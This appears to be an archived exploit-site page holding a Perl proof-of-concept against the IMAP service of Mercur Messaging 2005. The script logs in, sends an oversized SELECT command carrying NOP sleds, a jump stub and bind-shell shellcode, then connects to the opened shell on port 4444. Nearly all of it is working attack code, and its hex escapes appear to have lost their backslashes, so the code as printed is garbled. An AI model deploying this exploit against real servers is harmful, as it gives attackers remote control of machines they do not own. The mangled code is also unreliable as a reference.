Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
# Published : 2007-01-15
# Author : Jacopo Cervini
# Previous Title : TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
# Next Title : FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)

#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";

my $nop = "x90"x8;

my $nop1 = "x90"x20;

my $ret = "x42xb2xc1x40";

#my $ret = "x42x42x42x42"; #call edi in mcrimap4.exe

my $asm="x8bxc7x83xc0x23x50xc3";

#	asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#
#	8BC7           MOV EAX,EDI
#	83C0 23        ADD EAX,23
#	50             PUSH EAX                                
#	C3             RETN




#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host


my $shellcode = 
"x59x81xc9xd3x62x30x20x41x43x4dx64".
"x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C".
"x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77".
"x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60".
"x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF".
"x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7".
"x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B".
"x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4".
"x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3".
"xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4".
"x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44".
"x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50".
"x50x56x50xFFx56xE4xFFx56xE8";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "a001 LOGIN $user $passrn";

send $socket, $request, 0;
print "[+] Sent loginn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."rn";

send $socket, $request, 0;
print "[+] Sent chunkn";

print " + Connect on port 4444 of $host ...n";
system("telnet $host 4444");

close $socket;
exit;

# www.Syue.com [2007-01-15]